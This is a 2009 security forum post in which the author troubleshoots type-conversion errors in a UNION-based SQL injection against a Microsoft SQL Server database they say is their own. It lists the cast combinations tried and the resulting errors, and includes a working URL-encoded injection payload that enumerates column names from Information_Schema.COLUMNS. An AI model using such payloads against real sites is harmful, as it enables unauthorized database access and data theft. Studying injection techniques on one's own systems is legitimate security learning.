SQL Injection - types changing

Networking/Security Forums -> Databases

Author: gizard PostPosted: Thu Mar 26, 2009 2:25 pm    Post subject: SQL Injection - types changing
    ----
Hi All, have you every come across an SQL injection where the datatype appears to change?

for example a simple union exploit where the datatypes require casting. However one cast keeps changing it's mind.

when I cast to money it says it's a text
When I cast to text it says conversion from nvarchar to money is not allowed.

It's as if the datatype changes everytime? However I have tried refreshing the same thing over and over and the SQL seams to remain static, so I don't think this is model logic changing the query.

There are 4 arguments to the SQL and two are defo nvarchar. I have tried the following with the given errors.

int, nvarchar,nvarchar,int text is incompatible with int
int, nvarchar,nvarchar,money text is incompatible with money
int, nvarchar,nvarchar,nvarchar Implicit conversion from data type nvarchar to money is not allowed. Use the CONVERT function to run this query.

money,nvarchar, nvarchar, int text is incompatible with int
money,nvarchar,nvarchar,money text is incompatible with money
money,nvarchar,nvarchar,nvarchar Implicit conversion from data type nvarchar to money is not allowed. Use the CONVERT function to run this query.

nvarchar,nvarchar,nvarchar,int text is incompatible with int
nvarchar,nvarchar,nvarchar,money text is incompatible with money
nvarchar,nvarchar,nvarchar,nvarchar Implicit conversion from data type nvarchar to money is not allowed. Use the CONVERT function to run this query.

The URL looks like this:
?id=-1%20union%20all%20select%20top%201%20convert(int,%271%27),convert(nvarchar(100),COLUMN_NAME%20COLLATE%20SQL_Latin1_General_CP1_CI_AS),convert(int,%273%27),cast(%279.99%27%20as%20money)%20from%20Information_Schema.COLUMNS%20where%201=1%20--

any help would be great, I am not going to sleep until I have figured this out.

PS This is my own box!
The data is: int, nvarchar,nvarchar,money



Networking/Security Forums -> Databases


output generated using printer-friendly topic mod, All times are GMT + 2 Hours

Page 1 of 1

Powered by phpBB 2.0.x © 2001 phpBB Group